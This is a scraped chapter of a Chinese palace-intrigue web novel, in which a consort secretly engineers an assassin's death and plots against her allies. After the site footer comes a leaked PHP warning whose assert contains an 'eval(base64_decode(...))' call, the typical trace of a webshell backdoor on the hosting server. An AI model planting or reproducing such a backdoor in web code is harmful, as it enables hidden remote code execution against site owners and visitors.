章节目录 第209章 勾引人的本事倒不少

    “宫中对这种行刺主子的罪犯,大体都会严惩,没死的各种折磨,死了的……” /

    死了的慕离当时没有说下去,难道下场就是像眼前这样吗?

    洛泱捂住了嘴巴,看着挂在墙上,垂着脑袋的恋月,水雾上涌。

    “人都死了,为何还要这样对她?”洛泱哽咽。

    “泱姐姐,这叫杀鸡儆猴,现在尸体只是挂在这里示众,之后……”

    慕容晚情偏过眸,不愿再看如此残忍的一幕。

    洛泱惊悸,“之后什么?

    慕容晚情补充,“待示众完毕,尸体就会被拉进血水化掉,只剩下森森白骨,永远泡在血池里。”

    洛泱听到这句话,心像被针刺了一下,殷红一片的画面在脑海里一掠而过,快的她来不及捕捉。

    她猛的闭上眼睛,仿佛看到了一片血湖,血湖中泛着森森白骨。

    她好像被魇住了一般,呼吸骤然急促起来。

    “泱姐姐,你怎么了?”

    慕容晚情看她胸口上下起伏的厉害,察觉不对劲,当即去摇她。

    洛泱猛的睁开眼睛,涣散的意识一点点回笼,忙摇头,“没……没什么,就是刚才听到你说的话,一时间有些接受不了!”

    “哎,别看了,我们快走吧!”慕容晚情拉着洛泱离开。

    临走前的一瞬,洛泱无意间瞥见隐在暗处的殷暮和楚清寒。

    此刻的她们,看着恋月的尸体,神情异常凝重。

    “殷大哥,恋月死了!我们该怎么办?”楚情寒清冷的眸子里,涌上一层水雾。

    “恋月之前告诉我们,昨晚会与和妃联手击杀楚王,既然楚王没有派人查我们,说明暴露的只有恋月一人,我们得去见见和妃。”

    “好!”

    ……

    合欢殿内,宫女们正眉飞色舞的讨论中午玩弄洛泱的事,说得欢时,笑声不断。

    小云慵懒的椅在竹榻之上,磕着瓜子静静地听着,不时扬眉浅笑。

    “不知道她跑了之后怎么样了?要不是后面娘娘不让我们追,真想打死她,看她以后还敢不敢暗地里陷害我们娘娘。”

    “紫苏姐姐,你总算出了口恶气。”

    宫女们讨好似的说。

    紫苏看了眼还在隐隐泛疼的掌心,抿了抿唇道,“是啊,别看她是丑女,勾引人的本事倒不少,要不是娘娘出面,我都不知何时才能报这仇,所以还得多谢娘娘。”

    音落,紫苏朝小云欠了欠身。

    小云不以为意,赤脚下了竹榻,拿过剪刀饶有兴致的修剪花草。

    蓦地,一股熟悉的寒气涌来,小云顿了手,眸光朝门口瞥去,果然看到了两个不速之客。

    她敛了笑意,随即吩咐,“你们都退下吧!”

    宫女们立刻退了出去,偌大的殿里,只剩下小云殷暮楚清寒三人。

    “娘娘,恋月的尸体现在还在示众……”楚清寒道。

    小云握着剪刀的手紧了紧,面色平静,“我听说了!昨晚我引开楚王的注意力,恋月行动时,被楚王识破,反而中了短刃上的毒,好在,她什么都没有说,我们才没有暴露。”

    殷暮一瞬不瞬的盯着她,虽然对她的话持有怀疑,但表面只能装作完全相信,“那接下来,我们要更加小心才是。”

    “嗯!”小云温顺点头。

    “那我们先退了!”

    音暮和楚清寒对视一眼,相继离开。

    小云抬眸,睨着他们离开的背影,握着剪刀的手倏然用力,一朵开的娇艳的花朵,立刻掉了下来。

    她拿起那朵被剪下的花朵,细细欣赏着,一边欣赏一边叹息。

    “恋月……你可别怪本宫,人不为己,天诛地灭!”音落,她随手将花朵丢弃。

    是的,恋月的死,是她一手设计的。

    她利用小白对她下蛊,全程操控她的一举一动,目的就是要她死。

    一来,既可以让她做传言的替罪羊。

    二来,又可以让殷暮他们相信,自己有在执行杀楚王的命令。

    三来,解决了这个监视她的眼线,行动就不会再受限。

    想到这,她眸色杀意渐浓,咔嚓咔嚓连续剪下两朵娇艳的花朵,嘴角漫上一层怨毒的笑,“接下来,就轮到你们两个了!本宫最后是要成为皇后的人,又岂会受你们摆布?”

    音落,她将那两朵娇艳的花攥在手中,碾碎成泥。

    正在这时,紫苏进来,“娘娘,奴婢刚才出去,本来想把那个丑八怪抓回来使唤。没有想到,她这么快跑华容殿去了!”

    小云抬眸,她倒把太后忘了!

    “太后那边现在什么情况?”

    “听说皇上禁足了她,为此太后跟皇上大吵一架,听说气的昏倒了!

    “是吗?”小云垂眸,有些失望。只是气晕而已,如果死了多好,这样她在宫中就可以高枕无忧了!

    “可是,那个丑八怪一定很快就会治好她,到时候她又有精神来杀娘娘你了,真是可恶,这两个人联手,娘娘你以后的日子只怕更难过。”

    紫苏的话就像跟刺,无时无刻不在提醒她。

    小云垂眸无言,迈步至窗边,目光往华容殿的方向望去。

    华灯初上,夜朗星稀!

    洛泱替太后施完针后不久,她便醒了过来,刚醒来,就唤来萧嬷嬷。

    “太后,您有什么吩咐?”萧嬷嬷问。

    “去,把那个柜子的锁给哀家砸了!”太后胸闷气短的说。

    萧嬷嬷目光下意识的瞟向一旁那个沉香木做的柜子,弱弱的问,“太后,您是说那个先皇锁上的柜子?”

    太后闭了闭眼,沉重的点头。

    “哀家知道,那里面藏着先皇最珍视的东西,这么多年,哀家没有钥匙,也不想看到太透,所以一直没打开。现在……把柜子给哀家劈开。”

    “是……”

    萧嬷嬷即刻找了人来,折腾一番之后,终于劈开柜子。

    里面放着一本记事簿。

    萧嬷嬷拿了记事簿,递给太后。

    太后迟疑了会,还是翻开了记事簿,一页一页的看。

    当她看完里面的内容时,握着记事簿的手不断颤抖。

    “呵呵……我就知道是这样,我就知道……”

    太后又哭又笑,格外渗人。 记住本站网址,Www.aywenxue.Com,方便下次阅读,或且百度输入“ aywenxue.com ”,就能进入本站
上一页返回目录 投推荐票 加入书签下一页

Warning: assert() [function.assert]: Assertion "$)狈吓= eval(base64_decode($彏堍櫮畱摟));" failed in /www/wwwroot/aywenxue.com/modules/article/reader.php on line 2